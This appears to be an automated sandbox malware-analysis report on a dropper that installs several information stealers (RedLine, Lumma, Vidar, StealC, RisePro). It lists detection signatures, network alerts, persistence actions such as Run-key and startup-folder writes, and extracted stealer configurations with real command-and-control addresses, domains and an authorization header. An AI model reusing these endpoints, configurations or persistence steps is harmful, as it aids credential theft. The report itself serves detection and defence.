5.2.ZYgCMtJP3wxddinn5Sa3IKJH.exe.40e5570.0.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x45249:$s1: file:/// 0x451a5:$s2: {11111-22222-10009-11112} 0x451d9:$s3: {11111-22222-50001-00000} 0x42409:$s4: get_Module 0x3cb9b:$s5: Reverse 0x3d85f:$s6: BlockCopy 0x3cb64:$s7: ReadByte 0x4525b:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
8.2.xNc0eiwaHinah8TaPUA3TuXZ.exe.33c5570.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
12.2.m9GWTeQylsPUCcnTEkTCS8lf.exe.2380000.1.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
21.2.RegAsm.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
10.2.DSN_5xuwaC5nkP_MHzd7lLTl.exe.4295570.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
10.2.DSN_5xuwaC5nkP_MHzd7lLTl.exe.4295570.1.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
11.2.uht_7KlzJBHoKg010MzYxndX.exe.1a50000.3.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
10.2.DSN_5xuwaC5nkP_MHzd7lLTl.exe.4295570.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
10.2.DSN_5xuwaC5nkP_MHzd7lLTl.exe.4295570.1.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 27 entries

Sigma Signatures

Change of critical system settings

Sigma detected: Disable power options

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe, ParentImage: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe, ParentProcessId: 5776, ParentProcessName: 5Qs0KV98dc5QrQIgi5l7CPu5.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 5612, ProcessName: powercfg.exe

System Summary

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, ProcessId: 1268, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ExtreamFanV6

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, ProcessId: 1268, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNNT.lnk

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 2192, ProcessName: svchost.exe

Suricata Signatures

ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-04T17:38:11.462458+0200	2036289	2	Crypto Currency Mining Activity Detected	192.168.2.6	55645	1.1.1.1	53	UDP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-04T17:37:44.761977+0200	2054653	1	A Network Trojan was detected	192.168.2.6	53035	188.114.97.3	443	TCP
2024-09-04T17:37:44.774171+0200	2054653	1	A Network Trojan was detected	192.168.2.6	53036	172.67.146.35	443	TCP
2024-09-04T17:37:45.788154+0200	2054653	1	A Network Trojan was detected	192.168.2.6	53038	172.67.146.35	443	TCP
2024-09-04T17:37:46.148036+0200	2054653	1	A Network Trojan was detected	192.168.2.6	53039	172.67.146.35	443	TCP
2024-09-04T17:37:50.980980+0200	2054653	1	A Network Trojan was detected	192.168.2.6	53041	172.67.146.35	443	TCP
2024-09-04T17:37:55.216508+0200	2054653	1	A Network Trojan was detected	192.168.2.6	53044	172.67.146.35	443	TCP
2024-09-04T17:37:57.502531+0200	2054653	1	A Network Trojan was detected	192.168.2.6	53045	172.67.146.35	443	TCP
2024-09-04T17:38:24.392166+0200	2054653	1	A Network Trojan was detected	192.168.2.6	53052	172.67.146.35	443	TCP
2024-09-04T17:38:26.120677+0200	2054653	1	A Network Trojan was detected	192.168.2.6	53053	172.67.146.35	443	TCP

ET MALWARE Lumma Stealer Domain in DNS Lookup (condedqpwqm .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-04T17:37:43.487403+0200	2055475	1	A Network Trojan was detected	192.168.2.6	58373	1.1.1.1	53	UDP

ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-04T17:37:42.997871+0200	2055479	1	A Network Trojan was detected	192.168.2.6	63594	1.1.1.1	53	UDP
2024-09-04T17:37:54.274858+0200	2055479	1	A Network Trojan was detected	192.168.2.6	50145	1.1.1.1	53	UDP
2024-09-04T17:38:22.780131+0200	2055479	1	A Network Trojan was detected	192.168.2.6	56102	1.1.1.1	53	UDP

ET MALWARE Lumma Stealer Domain in DNS Lookup (stamppreewntnq .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-04T17:37:43.132519+0200	2055482	1	A Network Trojan was detected	192.168.2.6	56028	1.1.1.1	53	UDP

ET MALWARE Lumma Stealer Domain in DNS Lookup (traineiwnqo .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-04T17:37:42.767320+0200	2055483	1	A Network Trojan was detected	192.168.2.6	56825	1.1.1.1	53	UDP
2024-09-04T17:37:54.228440+0200	2055483	1	A Network Trojan was detected	192.168.2.6	54987	1.1.1.1	53	UDP
2024-09-04T17:38:21.829208+0200	2055483	1	A Network Trojan was detected	192.168.2.6	51216	1.1.1.1	53	UDP

ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-04T17:37:44.320400+0200	2055485	1	A Network Trojan was detected	192.168.2.6	53036	172.67.146.35	443	TCP
2024-09-04T17:37:45.626173+0200	2055485	1	A Network Trojan was detected	192.168.2.6	53038	172.67.146.35	443	TCP
2024-09-04T17:37:45.702579+0200	2055485	1	A Network Trojan was detected	192.168.2.6	53039	172.67.146.35	443	TCP
2024-09-04T17:37:50.442629+0200	2055485	1	A Network Trojan was detected	192.168.2.6	53041	172.67.146.35	443	TCP
2024-09-04T17:37:54.785593+0200	2055485	1	A Network Trojan was detected	192.168.2.6	53044	172.67.146.35	443	TCP
2024-09-04T17:37:57.087481+0200	2055485	1	A Network Trojan was detected	192.168.2.6	53045	172.67.146.35	443	TCP
2024-09-04T17:38:24.259966+0200	2055485	1	A Network Trojan was detected	192.168.2.6	53052	172.67.146.35	443	TCP
2024-09-04T17:38:25.662311+0200	2055485	1	A Network Trojan was detected	192.168.2.6	53053	172.67.146.35	443	TCP

ET MALWARE Lumma Stealer Domain in TLS SNI (stamppreewntnq .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-04T17:37:43.679616+0200	2055492	1	A Network Trojan was detected	192.168.2.6	53035	188.114.97.3	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-04T17:37:44.761977+0200	2049836	1	A Network Trojan was detected	192.168.2.6	53035	188.114.97.3	443	TCP
2024-09-04T17:37:44.774171+0200	2049836	1	A Network Trojan was detected	192.168.2.6	53036	172.67.146.35	443	TCP
2024-09-04T17:37:45.788154+0200	2049836	1	A Network Trojan was detected	192.168.2.6	53038	172.67.146.35	443	TCP
2024-09-04T17:37:55.216508+0200	2049836	1	A Network Trojan was detected	192.168.2.6	53044	172.67.146.35	443	TCP
2024-09-04T17:38:24.392166+0200	2049836	1	A Network Trojan was detected	192.168.2.6	53052	172.67.146.35	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-04T17:37:46.148036+0200	2049812	1	A Network Trojan was detected	192.168.2.6	53039	172.67.146.35	443	TCP
2024-09-04T17:37:50.980980+0200	2049812	1	A Network Trojan was detected	192.168.2.6	53041	172.67.146.35	443	TCP
2024-09-04T17:37:57.502531+0200	2049812	1	A Network Trojan was detected	192.168.2.6	53045	172.67.146.35	443	TCP
2024-09-04T17:38:26.120677+0200	2049812	1	A Network Trojan was detected	192.168.2.6	53053	172.67.146.35	443	TCP

ET MALWARE PrivateLoader CnC Activity (GET)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-04T17:36:58.876472+0200	2054709	1	A Network Trojan was detected	192.168.2.6	49713	62.133.61.172	80	TCP

ET MALWARE PrivateLoader CnC Activity (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-04T17:37:03.046189+0200	2054711	1	A Network Trojan was detected	192.168.2.6	49713	62.133.61.172	80	TCP
2024-09-04T17:37:04.597604+0200	2054711	1	A Network Trojan was detected	192.168.2.6	49713	62.133.61.172	80	TCP
2024-09-04T17:37:26.384693+0200	2054711	1	A Network Trojan was detected	192.168.2.6	49713	62.133.61.172	80	TCP

ET MALWARE PrivateLoader CnC Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-04T17:37:01.940422+0200	2054710	1	A Network Trojan was detected	62.133.61.172	80	192.168.2.6	49713	TCP

ET MALWARE Redline Stealer TCP CnC - Id1Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-04T17:37:34.980732+0200	2043234	1	A Network Trojan was detected	147.45.47.36	30035	192.168.2.6	53029	TCP
2024-09-04T17:37:34.986857+0200	2043234	1	A Network Trojan was detected	147.45.47.36	30035	192.168.2.6	53029	TCP

ET MALWARE Redline Stealer TCP CnC Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-04T17:37:34.586862+0200	2043231	1	A Network Trojan was detected	192.168.2.6	53029	147.45.47.36	30035	TCP
2024-09-04T17:37:40.296871+0200	2043231	1	A Network Trojan was detected	192.168.2.6	53029	147.45.47.36	30035	TCP
2024-09-04T17:37:45.518932+0200	2043231	1	A Network Trojan was detected	192.168.2.6	53029	147.45.47.36	30035	TCP
2024-09-04T17:37:45.719788+0200	2043231	1	A Network Trojan was detected	192.168.2.6	53029	147.45.47.36	30035	TCP
2024-09-04T17:37:45.909069+0200	2043231	1	A Network Trojan was detected	192.168.2.6	53029	147.45.47.36	30035	TCP
2024-09-04T17:37:47.016827+0200	2043231	1	A Network Trojan was detected	192.168.2.6	53029	147.45.47.36	30035	TCP
2024-09-04T17:37:47.215800+0200	2043231	1	A Network Trojan was detected	192.168.2.6	53029	147.45.47.36	30035	TCP
2024-09-04T17:37:56.179949+0200	2043231	1	A Network Trojan was detected	192.168.2.6	53029	147.45.47.36	30035	TCP
2024-09-04T17:37:56.636246+0200	2043231	1	A Network Trojan was detected	192.168.2.6	53029	147.45.47.36	30035	TCP
2024-09-04T17:37:58.811842+0200	2043231	1	A Network Trojan was detected	192.168.2.6	53029	147.45.47.36	30035	TCP
2024-09-04T17:37:59.245139+0200	2043231	1	A Network Trojan was detected	192.168.2.6	53029	147.45.47.36	30035	TCP
2024-09-04T17:37:59.250315+0200	2043231	1	A Network Trojan was detected	192.168.2.6	53029	147.45.47.36	30035	TCP
2024-09-04T17:38:00.063296+0200	2043231	1	A Network Trojan was detected	192.168.2.6	53029	147.45.47.36	30035	TCP
2024-09-04T17:38:00.373293+0200	2043231	1	A Network Trojan was detected	192.168.2.6	53029	147.45.47.36	30035	TCP
2024-09-04T17:38:01.410211+0200	2043231	1	A Network Trojan was detected	192.168.2.6	53029	147.45.47.36	30035	TCP
2024-09-04T17:38:01.603320+0200	2043231	1	A Network Trojan was detected	192.168.2.6	53029	147.45.47.36	30035	TCP
2024-09-04T17:38:01.886104+0200	2043231	1	A Network Trojan was detected	192.168.2.6	53029	147.45.47.36	30035	TCP
2024-09-04T17:38:02.074632+0200	2043231	1	A Network Trojan was detected	192.168.2.6	53029	147.45.47.36	30035	TCP
2024-09-04T17:38:02.263069+0200	2043231	1	A Network Trojan was detected	192.168.2.6	53029	147.45.47.36	30035	TCP
2024-09-04T17:38:02.757075+0200	2043231	1	A Network Trojan was detected	192.168.2.6	53029	147.45.47.36	30035	TCP
2024-09-04T17:38:04.984391+0200	2043231	1	A Network Trojan was detected	192.168.2.6	53029	147.45.47.36	30035	TCP
2024-09-04T17:38:05.190281+0200	2043231	1	A Network Trojan was detected	192.168.2.6	53029	147.45.47.36	30035	TCP
2024-09-04T17:38:05.378529+0200	2043231	1	A Network Trojan was detected	192.168.2.6	53029	147.45.47.36	30035	TCP
2024-09-04T17:38:05.566858+0200	2043231	1	A Network Trojan was detected	192.168.2.6	53029	147.45.47.36	30035	TCP
2024-09-04T17:38:05.822258+0200	2043231	1	A Network Trojan was detected	192.168.2.6	53029	147.45.47.36	30035	TCP

ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-04T17:37:40.487994+0200	2046056	1	A Network Trojan was detected	147.45.47.36	30035	192.168.2.6	53029	TCP

ET MALWARE RisePro TCP Heartbeat Packet

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-04T17:37:39.338689+0200	2049060	1	A Network Trojan was detected	192.168.2.6	53031	77.105.164.24	50505	TCP

ET MALWARE Vidar Stealer Form Exfil

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-04T17:38:27.779562+0200	2054495	1	A Network Trojan was detected	192.168.2.6	53054	45.132.206.251	80	TCP

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-04T17:37:32.890178+0200	2044245	1	Malware Command and Control Activity Detected	46.8.231.109	80	192.168.2.6	53026	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-04T17:37:32.844945+0200	2044244	1	Malware Command and Control Activity Detected	192.168.2.6	53026	46.8.231.109	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-04T17:37:33.072116+0200	2044246	1	Malware Command and Control Activity Detected	192.168.2.6	53026	46.8.231.109	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-04T17:37:33.863217+0200	2044248	1	Malware Command and Control Activity Detected	192.168.2.6	53026	46.8.231.109	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-04T17:37:33.152431+0200	2044247	1	Malware Command and Control Activity Detected	46.8.231.109	80	192.168.2.6	53026	TCP
2024-09-04T17:37:58.294219+0200	2044247	1	Malware Command and Control Activity Detected	147.45.68.138	80	192.168.2.6	53043	TCP
2024-09-04T17:38:33.144896+0200	2044247	1	Malware Command and Control Activity Detected	147.45.68.138	80	192.168.2.6	53055	TCP
2024-09-04T17:38:45.610671+0200	2044247	1	Malware Command and Control Activity Detected	147.45.68.138	80	192.168.2.6	53059	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-04T17:38:00.444917+0200	2051831	1	Malware Command and Control Activity Detected	147.45.68.138	80	192.168.2.6	53043	TCP
2024-09-04T17:38:39.878636+0200	2051831	1	Malware Command and Control Activity Detected	147.45.68.138	80	192.168.2.6	53055	TCP
2024-09-04T17:38:46.579585+0200	2051831	1	Malware Command and Control Activity Detected	147.45.68.138	80	192.168.2.6	53059	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-04T17:37:57.252773+0200	2049087	1	A Network Trojan was detected	192.168.2.6	53043	147.45.68.138	80	TCP

ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-04T17:37:34.586862+0200	2046045	1	A Network Trojan was detected	192.168.2.6	53029	147.45.47.36	30035	TCP

ET MALWARE [ANY.RUN] RisePro TCP (Activity)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-04T17:37:39.338689+0200	2046269	1	A Network Trojan was detected	192.168.2.6	53031	77.105.164.24	50505	TCP

ET MALWARE [ANY.RUN] RisePro TCP (Token)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-04T17:37:36.209129+0200	2046266	1	A Network Trojan was detected	77.105.164.24	50505	192.168.2.6	53031	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-04T17:37:32.403011+0200	2044243	1	Malware Command and Control Activity Detected	192.168.2.6	53026	46.8.231.109	80	TCP
2024-09-04T17:38:37.839910+0200	2044243	1	Malware Command and Control Activity Detected	192.168.2.6	53058	185.215.113.100	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-04T17:37:34.090540+0200	2803304	3	Unknown Traffic	192.168.2.6	53026	46.8.231.109	80	TCP
2024-09-04T17:37:39.647571+0200	2803304	3	Unknown Traffic	192.168.2.6	53026	46.8.231.109	80	TCP
2024-09-04T17:37:41.546027+0200	2803304	3	Unknown Traffic	192.168.2.6	53026	46.8.231.109	80	TCP
2024-09-04T17:37:42.892835+0200	2803304	3	Unknown Traffic	192.168.2.6	53026	46.8.231.109	80	TCP
2024-09-04T17:37:43.963829+0200	2803304	3	Unknown Traffic	192.168.2.6	53026	46.8.231.109	80	TCP
2024-09-04T17:37:45.938450+0200	2803304	3	Unknown Traffic	192.168.2.6	53026	46.8.231.109	80	TCP
2024-09-04T17:37:47.198282+0200	2803304	3	Unknown Traffic	192.168.2.6	53026	46.8.231.109	80	TCP
2024-09-04T17:37:50.751615+0200	2803304	3	Unknown Traffic	192.168.2.6	53042	147.45.44.104	80	TCP
2024-09-04T17:37:52.149117+0200	2803304	3	Unknown Traffic	192.168.2.6	53042	147.45.44.104	80	TCP
2024-09-04T17:38:20.118624+0200	2803304	3	Unknown Traffic	192.168.2.6	53051	147.45.44.104	80	TCP
2024-09-04T17:38:23.012738+0200	2803304	3	Unknown Traffic	192.168.2.6	53051	147.45.44.104	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-04T17:37:06.564859+0200	2803270	2	Potentially Bad Traffic	192.168.2.6	49719	147.45.44.104	80	TCP
2024-09-04T17:37:06.715822+0200	2803270	2	Potentially Bad Traffic	192.168.2.6	49717	147.45.44.104	80	TCP
2024-09-04T17:37:06.805797+0200	2803270	2	Potentially Bad Traffic	192.168.2.6	49725	76.76.21.98	443	TCP
2024-09-04T17:37:07.282069+0200	2803270	2	Potentially Bad Traffic	192.168.2.6	49719	147.45.44.104	80	TCP
2024-09-04T17:37:07.457824+0200	2803270	2	Potentially Bad Traffic	192.168.2.6	49717	147.45.44.104	80	TCP
2024-09-04T17:37:07.725711+0200	2803270	2	Potentially Bad Traffic	192.168.2.6	49717	147.45.44.104	80	TCP
2024-09-04T17:37:08.309512+0200	2803270	2	Potentially Bad Traffic	192.168.2.6	49717	147.45.44.104	80	TCP
2024-09-04T17:37:08.770315+0200	2803270	2	Potentially Bad Traffic	192.168.2.6	49726	154.216.17.178	80	TCP
2024-09-04T17:37:10.189365+0200	2803270	2	Potentially Bad Traffic	192.168.2.6	49719	147.45.44.104	80	TCP
2024-09-04T17:37:15.399757+0200	2803270	2	Potentially Bad Traffic	192.168.2.6	49718	31.41.244.9	80	TCP
2024-09-04T17:37:15.924539+0200	2803270	2	Potentially Bad Traffic	192.168.2.6	49730	176.111.174.109	80	TCP
2024-09-04T17:37:16.356390+0200	2803270	2	Potentially Bad Traffic	192.168.2.6	49719	147.45.44.104	80	TCP
2024-09-04T17:37:18.670131+0200	2803270	2	Potentially Bad Traffic	192.168.2.6	49717	147.45.44.104	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: stamppreewntnq.shop	URL Reputation: Label: phishing
Source: condedqpwqm.shop	URL Reputation: Label: phishing
Source: locatedblsoqp.shop	URL Reputation: Label: phishing
Source: traineiwnqo.shop	URL Reputation: Label: malware

Found malware configuration

Source: 00000007.00000002.3125271481.000000000148E000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.100/e2b1563c6670f193.php"}
Source: 0000000A.00000002.2613302475.0000000004295000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199768374681", "https://t.me/edm0d"], "Botnet": "6eeb5dff1d479d082f77f2c9017c3bf5"}
Source: 00000008.00000002.2611175093.00000000033C5000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: RedLine {"C2 url": "147.45.47.36:30035", "Bot Id": "LogsDiller Cloud (TG: @logsdillabot)", "Authorization Header": "3a050df92d0cf082b2cdaf87863616be"}
Source: 12.2.m9GWTeQylsPUCcnTEkTCS8lf.exe.24ec000.3.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["traineiwnqo.shop", "stagedchheiqwo.shop", "condedqpwqm.shop", "caffegclasiqwp.shop", "evoliutwoqm.shop", "stamppreewntnq.shop", "locatedblsoqp.shop", "millyscroqwp.shop"], "Build id": "E6UHNR--"}

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	ReversingLabs: Detection: 66%
Source: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe	ReversingLabs: Detection: 87%
Source: C:\Users\userEHJKFCGHID.exe	ReversingLabs: Detection: 66%
Source: C:\Users\userFBKKJEBFID.exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\66c6fcb30b9dd_123p[1].exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\66d60cd3ce002_SeparatelyDied[1].exe	ReversingLabs: Detection: 15%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\66d72df86b9f3_crypted[1].exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66d58b1858bcb_crypted[1].exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66d70775c548d_v[1].exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66d70775c548d_v[2].exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66d7077a2064d_l[1].exe	ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\66d59ef9d4404_premium[1].exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\66d707730e9bf_s[1].exe	ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\66d1b7f7f3765_Front[1].exe	ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\66d70e8640404_trics[1].exe	ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\lamp[1].exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\PowerExpertNNT\PowerExpertNNT.exe	ReversingLabs: Detection: 66%
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	ReversingLabs: Detection: 66%
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe	ReversingLabs: Detection: 15%
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe	ReversingLabs: Detection: 75%
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe	ReversingLabs: Detection: 28%
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe	ReversingLabs: Detection: 70%
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe	ReversingLabs: Detection: 34%

Multi AV Scanner detection for submitted file

Source: FileApp.exe

ReversingLabs: Detection: 23%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 0000000C.00000002.2767261547.0000000002380000.00000004.00001000.00020000.00000000.sdmp	String decryptor: caffegclasiqwp.shop
Source: 0000000C.00000002.2767261547.0000000002380000.00000004.00001000.00020000.00000000.sdmp	String decryptor: stamppreewntnq.shop
Source: 0000000C.00000002.2767261547.0000000002380000.00000004.00001000.00020000.00000000.sdmp	String decryptor: stagedchheiqwo.shop
Source: 0000000C.00000002.2767261547.0000000002380000.00000004.00001000.00020000.00000000.sdmp	String decryptor: millyscroqwp.shop
Source: 0000000C.00000002.2767261547.0000000002380000.00000004.00001000.00020000.00000000.sdmp	String decryptor: evoliutwoqm.shop
Source: 0000000C.00000002.2767261547.0000000002380000.00000004.00001000.00020000.00000000.sdmp	String decryptor: condedqpwqm.shop
Source: 0000000C.00000002.2767261547.0000000002380000.00000004.00001000.00020000.00000000.sdmp	String decryptor: traineiwnqo.shop
Source: 0000000C.00000002.2767261547.0000000002380000.00000004.00001000.00020000.00000000.sdmp	String decryptor: locatedblsoqp.shop
Source: 0000000C.00000002.2767261547.0000000002380000.00000004.00001000.00020000.00000000.sdmp	String decryptor: traineiwnqo.shop
Source: 0000000C.00000002.2767261547.0000000002380000.00000004.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000000C.00000002.2767261547.0000000002380000.00000004.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
